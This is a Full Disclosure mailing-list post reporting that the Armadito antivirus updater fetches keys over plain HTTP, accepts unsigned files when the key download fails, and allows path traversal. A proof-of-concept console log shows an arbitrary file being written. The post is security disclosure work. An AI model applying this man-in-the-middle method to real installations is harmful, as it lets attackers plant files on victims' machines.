Aramadito remote arbitrary file write in case of MiTM

[<thedeadcow () tutanota com>]

Armadito (https://github.com/armadito) is a cross-platform open-source 
antivirus, that was originally the DAVFI project, financed through a french 
government program.

As a security product supposed to protect computers against malware, its 
update system fails at multiple points:
* the public key used to check update packages is retrieved using plain HTTP. 
The same goes for the packages themselves.
* if Armadito can't download this public key, a bug makes it consider any 
file it checks as valid (you don't even need to forge a signature)
* a vulnerability as old as the General de Gaulle (path traversal) then 
allows to download a controlled URL to an arbitrary path

All this allows someone in control of DNS answers or more generally in a MiTM 
position to write arbitrary files when the update process is performed. It 
also allows the editor to do it if they want (but db.armadito.org does not 
seem to work at the time of writing this email). A simple python HTTP server 
is attached to this mail as a proof-of-concept.

This happens in the ArmaditoSvc tool using the "--updatedb" flag. The 
documentation doesn't specify if this should run as an administrator or not.

Here is an example of the output of this tool when a potential MiTM is 
performed:

===========
C:\tmp\armadito>type ..\cow.txt
File specified not found.

C:\tmp\armadito>ArmaditoSvc.exe --updatedb
---------------------------------
----- Armadito Scan service -----
---------------------------------
[+] Debug :: UpdateModulesDB :: description file downloaded successfully!
[+] Debug :: UpdateModulesDB :: signature file downloaded successfully!
armadito[4624]: <error> [-] Error :: download_pub_key :: 
URLDownloadToCacheFileA failed :: error = 0x800c0006

armadito[4624]: <error> [-] Error :: verify_file_signature :: Can't download 
public key from armadito server!

armadito[4624]: <error> [-] Error :: verify_file_signature :: Crypt Destroy 
Key failed! :: GLE = 0x57

[+] Debug :: UpdateModulesDB :: File Signature verified successfully !
[-] Error :: GetFileContent :: Opening the file failed! :: error = 3

[+] Debug :: DownloadPackageFiles :: Downloading file from :: 
http://127.0.0.1/cow....
[+] Debug :: DownloadPackageFiles :: cache filename = 
XX\AppData\Local\Microsoft\Windows\INetCache\IE\3YTFPC0U\cow[1].htm
[+] Debug :: ConvertBytesToChar :: string = 4dc9a4320e79db56894c037f27d5dc0a
[+] Debug :: DownloadPackageFiles :: checksum = 
4dc9a4320e79db56894c037f27d5dc0a
[-] Warning :: no notify handler! :: call a6o_notify_set_handler first
[+] Debug :: UpdateModulesDB :: Armadito service suspended successfully!

[+] Debug :: get_db_module_path :: completePath = 
C:\tmp\armadito\modules\DB\..\..\..\..\..\..\..\..\..\..\..\tmp\cow.txt
Conf_file = C:\tmp\armadito\conf\armadito.conf [+] Debug :: 
init_configuration :: conf file = C:\tmp\armadito\conf\armadito.conf
armadito[4624]: <warning> cannot open conf file 
C:\tmp\armadito\conf\armadito.conf
[+] Debug :: Configuration loaded successfully!
[+] Debug :: Armadito structure loaded successfully!
armadito[4624]: <error> [-] Error :: FilterConnectCommunicationPort() failed 
:: errcode = 0x80070002

armadito[4624]: <error> Scan Thread initialization failed!

armadito[4624]: <error> Service loaded with errors during pause.

[+] Debug :: UpdateModulesDB :: Armadito service resumed successfully!
armadito[4624]: <error> [-] Error :: SaveHashInCacheFile :: Creating the 
cache file failed! :: error = 3

[+] Debug :: UpdateModulesDB :: Modules Database updated successfully!
[-] Warning :: no notify handler! :: call a6o_notify_set_handler first

C:\tmp\armadito>type ..\cow.txt
put_your_dead_cow_here
==============

This is an irresponsible disclosure due to irresponsible spending of the 
French people's money.

The Dead Cow.

Attachment: serv.py
Description:

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/